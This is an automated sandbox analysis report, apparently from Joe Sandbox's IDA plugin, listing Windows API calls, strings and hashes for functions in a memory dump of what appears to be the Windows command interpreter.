• Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_40000_alpha.jbxd
Similarity
• API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
• String ID:
• API String ID: 3609286125-0
APIs
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00067483
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00067495
• fprintf.MSVCRT ref: 000674BB
• fflush.MSVCRT ref: 000674C9
• TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 000674E2
• NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 000674F8
• ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 000674FF
• _get_osfhandle.MSVCRT ref: 0006751C
• FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00067524
Memory Dump Source
• Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_40000_alpha.jbxd
Similarity
• API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
• String ID:
• API String ID: 3139166086-0
APIs
• _setjmp3.MSVCRT ref: 00044E78
  • Part of subcall function 00048E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00088BF0,00000000,?), ref: 00048EC3
  • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
  • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
• NtQueryInformationProcess.NTDLL ref: 00044F28
• NtSetInformationProcess.NTDLL ref: 00044F46
• NtSetInformationProcess.NTDLL ref: 00044FAE
• longjmp.MSVCRT(00080A30,00000001,00000000), ref: 000591C8
Memory Dump Source
• Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_40000_alpha.jbxd
Similarity
• API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
• String ID: %9d$P,Fw
• API String ID: 4212706909-3698535272
APIs
  • Part of subcall function 00051D90: _wcsnicmp.MSVCRT ref: 00051E14
  • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
  • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
  • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
  • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
  • Part of subcall function 00054BAF: _wcsnicmp.MSVCRT ref: 00054C1A
  • Part of subcall function 00054BAF: _wcsnicmp.MSVCRT ref: 00060B39
• memset.MSVCRT ref: 00054975
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,-00000001,00000000,-00000001,00000104,00000000,00000001), ref: 00054ABC
• GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00054AF4
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00054AFF
• ??_V@YAXPAX@Z.MSVCRT(?,00000000), ref: 00054B28
Memory Dump Source
• Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_40000_alpha.jbxd
Similarity
• API ID: _wcsnicmpwcschr$ErrorLast$AttributesFileiswspacememset
• String ID: COPYCMD
• API String ID: 1068965577-3727491224
APIs
• memset.MSVCRT ref: 00047A9C
• memset.MSVCRT ref: 00047AC7
  • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
  • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
  • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
• ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00047BCA
• ??_V@YAXPAX@Z.MSVCRT(?,00007FE9,?,?,?,?,00000000,?), ref: 00047BDC
• longjmp.MSVCRT(00080A30,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 0005AE5B
Memory Dump Source
• Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_40000_alpha.jbxd
Similarity
• API ID: memset$Heap$AllocProcesslongjmp
• String ID:
• API String ID: 2656838167-0
                                                                      • Opcode ID: 581e295dd17a90c878fbaa0bd6edbd8d60324aa5cca666b44d099953c2e8fbdd
                                                                      • Instruction ID: 0c23aff8a2b1c90f0edb355dbdb821dc96399910bfc4438f525a029983c5d079
                                                                      • Opcode Fuzzy Hash: 581e295dd17a90c878fbaa0bd6edbd8d60324aa5cca666b44d099953c2e8fbdd
                                                                      • Instruction Fuzzy Hash: DDD1E4B0A042159BDF78DF24C8957AEB7B1FF05301F4441ADD90EA7681DB70AE84CB99
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3168844106-0
                                                                      • Opcode ID: 5283b641b7d1721d9d51079d637e0ef28c4b7af30ec14645759fde1de79a8b04
                                                                      • Instruction ID: a00841dc806656bb08aebdfc3b2bbd9ca310c6084f059df0f54e30a814a865e0
                                                                      • Opcode Fuzzy Hash: 5283b641b7d1721d9d51079d637e0ef28c4b7af30ec14645759fde1de79a8b04
                                                                      • Instruction Fuzzy Hash: 1FC1B3716083018FD764EF24C851A6BB7E2EF99304F04897DEC8687352EB35D949CB96
                                                                      APIs
                                                                      • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,?,00062FDD), ref: 00062E5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 1347740429-0
                                                                      • Opcode ID: 82336f1864a524b1d3790781bbac8ac67168c886a38aa2aede7602195fb0215d
                                                                      • Instruction ID: 0ea5e392c945151aba57203a8936f717cfeac9c737af0dc5b73ad4087109f20c
                                                                      • Opcode Fuzzy Hash: 82336f1864a524b1d3790781bbac8ac67168c886a38aa2aede7602195fb0215d
                                                                      • Instruction Fuzzy Hash: E7E0C230742B219FFB222B645C883B936CE2B32B14B280476E891DB151C75F9C049BA0
                                                                      APIs
                                                                      • InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000001,00000000,00000020,0006C9D0,00000108,00052107,?,00000000,00000000,00000000), ref: 000494AA
                                                                      • UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00060001,?,00000004,00000000,00000000,?,00000000,00000000,00000000), ref: 000494D9
                                                                      • memset.MSVCRT ref: 000494F1
                                                                      • memset.MSVCRT ref: 0004954A
                                                                      • GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000044), ref: 0004955D
                                                                        • Part of subcall function 00051D90: _wcsnicmp.MSVCRT ref: 00051E14
                                                                      • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(00000000,\XCOPY.EXE), ref: 000495B8
                                                                      • CreateProcessW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 00049602
                                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00049624
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0005BDF1
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000,00000000), ref: 0005BE0D
                                                                      • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 0005BE26
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: AttributeProcThread$ErrorLastListmemset$CloseCreateDeleteHandleInfoInitializeProcessStartupUpdate_wcsnicmplstrcmp
                                                                      • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                                                      • API String ID: 1449572041-3461277227
                                                                      • Opcode ID: 27068372b539e2e4e079ab3d68791b871267f170f294d51f144f9158789dd73b
                                                                      • Instruction ID: d23a03576fb2fffa03ac74112316eb3e2ca68bc86fb0fe98ad2f7ea18f240339
                                                                      • Opcode Fuzzy Hash: 27068372b539e2e4e079ab3d68791b871267f170f294d51f144f9158789dd73b
                                                                      • Instruction Fuzzy Hash: CCC1A1B0A003149FEB649F64CC45BEF77B8EB45305F1440BAEA4AD6241EB789D84CF66
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp$iswspace
                                                                      • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                      • API String ID: 759518647-875390083
                                                                      • Opcode ID: 017c0afd254d34880f0dae34b5e411499e883473c225ef5b03eed4e3d2e7c902
                                                                      • Instruction ID: a9f32ea89b6cf1a94195750317fe81dbc61c0b0fc5fdf8908ec25327b7818831
                                                                      • Opcode Fuzzy Hash: 017c0afd254d34880f0dae34b5e411499e883473c225ef5b03eed4e3d2e7c902
                                                                      • Instruction Fuzzy Hash: 39A10BB134420386FB786B65AC49B7B23A4FF41712F14443AF9424A5D2EFB89849C71F
                                                                      APIs
                                                                      • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0006E590,00002000,?,00088BF0,00000000,?,?,00048F0D), ref: 0004EC51
                                                                      • _wcsicmp.MSVCRT ref: 0004EC77
                                                                      • _wcsicmp.MSVCRT ref: 0004EC8D
                                                                      • _wcsicmp.MSVCRT ref: 0004ECA3
                                                                      • _wcsicmp.MSVCRT ref: 0004ECB9
                                                                      • _wcsicmp.MSVCRT ref: 0004ECCF
                                                                      • _wcsicmp.MSVCRT ref: 0004ECE5
                                                                      • _wcsicmp.MSVCRT ref: 0004ECF7
                                                                      • _wcsicmp.MSVCRT ref: 0004ED0D
                                                                        • Part of subcall function 00049310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0006E590,?,00002000), ref: 00049342
                                                                        • Part of subcall function 00049310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00049356
                                                                        • Part of subcall function 00049310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0004936A
                                                                        • Part of subcall function 00049310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0004937E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                      • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                      • API String ID: 2447294730-2301591722
                                                                      • Opcode ID: e65b21cf0676ab6a6bcbbe66d1c39e10def2d9e6a2580c8db3688df3d1e3ac90
                                                                      • Instruction ID: 2fd1cd4330a2ff09907a43667d813a502a26526cc64591d38e172944667a7632
                                                                      • Opcode Fuzzy Hash: e65b21cf0676ab6a6bcbbe66d1c39e10def2d9e6a2580c8db3688df3d1e3ac90
                                                                      • Instruction Fuzzy Hash: 8431FAB2709741BBB7145721EC4EA6F279DFB86321B14443BF506D04C1EF6C9501836E
                                                                      APIs
                                                                      • _wcsupr.MSVCRT ref: 00069CC8
                                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00069D22
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00069D2A
                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00069D3A
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00069D50
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00069D58
                                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00069D68
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00069D7C
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00069DDB
                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00069DE2
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00069DF2
                                                                      • towupper.MSVCRT ref: 00069E13
                                                                        • Part of subcall function 0004A16C: _close.MSVCRT ref: 0004A19B
                                                                      • wcschr.MSVCRT ref: 00069E6A
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00069E9B
                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00069EA9
                                                                        • Part of subcall function 0004DD98: _get_osfhandle.MSVCRT ref: 0004DDA3
                                                                        • Part of subcall function 0004DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0005C050), ref: 0004DDAD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                      • String ID: <noalias>$CMD.EXE
                                                                      • API String ID: 2015057810-1690691951
                                                                      • Opcode ID: 7579fa74778c8085dd0ace3798328bc529ba879f06eff6e377fa87480318fc38
                                                                      • Instruction ID: 392f4cfb90270d86f07badac2dabed6a3329021d111be37a99321bb938f2501f
                                                                      • Opcode Fuzzy Hash: 7579fa74778c8085dd0ace3798328bc529ba879f06eff6e377fa87480318fc38
                                                                      • Instruction Fuzzy Hash: 8C81F672A00214ABEF149FB4DC459EEBBFEAF46720F14012AF802E7591EB359D41CB65
                                                                      APIs
                                                                        • Part of subcall function 00049A11: _get_osfhandle.MSVCRT ref: 00049A1C
                                                                        • Part of subcall function 00049A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0004793A,00000104,?), ref: 00049A2B
                                                                        • Part of subcall function 00049A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A47
                                                                        • Part of subcall function 00049A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A56
                                                                        • Part of subcall function 00049A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374), ref: 00049A61
                                                                        • Part of subcall function 00049A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04,?,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00049A6A
                                                                      • _get_osfhandle.MSVCRT ref: 00047943
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00047908,00002374,-00000001), ref: 00047951
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00080AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 000479BE
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00047A1C
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00047A27
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                      • String ID:
                                                                      • API String ID: 2173784998-0
                                                                      • Opcode ID: 9d18159e99c1cd16d960864c800da643d3ab4a729b2891c7dba2cf076dd2f291
                                                                      • Instruction ID: d57f4813b4ca52628ef93a432be14eea2290a07c7d177c478e863770340737ff
                                                                      • Opcode Fuzzy Hash: 9d18159e99c1cd16d960864c800da643d3ab4a729b2891c7dba2cf076dd2f291
                                                                      • Instruction Fuzzy Hash: 197171B1A00214AFEB24DFA4DC88ABEBBB9FF45311F14452AE946E6650DB389C44CB51
                                                                      APIs
                                                                      • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00062931
                                                                      • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00062998
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentFormatMessageThread
                                                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                      • API String ID: 2411632146-3173542853
                                                                      • Opcode ID: 454ea4a685715d16186e9be2c828b7437c3754e976679e3cb8fdbc9a30564bca
                                                                      • Instruction ID: 7ff866de631e94e637987e282ee170993542c3891384ca5bdaed552789a025e1
                                                                      • Opcode Fuzzy Hash: 454ea4a685715d16186e9be2c828b7437c3754e976679e3cb8fdbc9a30564bca
                                                                      • Instruction Fuzzy Hash: 225157B1500704BBEB305F688C0AEABB7FAEF85700F00456DF645A2152DA75EA84CB62
                                                                      APIs
                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,0005B7DB,0000000C,00000004,00000080,00000000), ref: 000505FF
                                                                      • _open_osfhandle.MSVCRT ref: 00050613
                                                                      • _wcsicmp.MSVCRT ref: 00050663
                                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 00050695
                                                                      • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 000506D3
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 000506FB
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 00050717
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 0005E89D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                      • String ID: con
                                                                      • API String ID: 58404892-4257191772
                                                                      • Opcode ID: 78a686b70a14bb8780d373c4812f255788f2c4365c0283daa2a784ea1e45ec44
                                                                      • Instruction ID: a3696803809cd4fac2e66c2664181ea209d45e6a77b772c107fd67fda1a775a1
                                                                      • Opcode Fuzzy Hash: 78a686b70a14bb8780d373c4812f255788f2c4365c0283daa2a784ea1e45ec44
                                                                      • Instruction Fuzzy Hash: 9951D770A00204ABFB248B94DC49BBF77F8FB45721F204226FD55E22D0E77999598B62
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0006C62E
                                                                      • memset.MSVCRT ref: 0006C656
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0006C6C7
                                                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0006C6E6
                                                                      • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0006C72A
                                                                      • _wcsicmp.MSVCRT ref: 0006C747
                                                                      • _wcsicmp.MSVCRT ref: 0006C76C
                                                                      • _wcsicmp.MSVCRT ref: 0006C794
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 0006C7B3
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 0006C7C5
                                                                      Similarity
                                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                      • String ID: CSVFS$NTFS$REFS
                                                                      • API String ID: 3510147486-2605508654
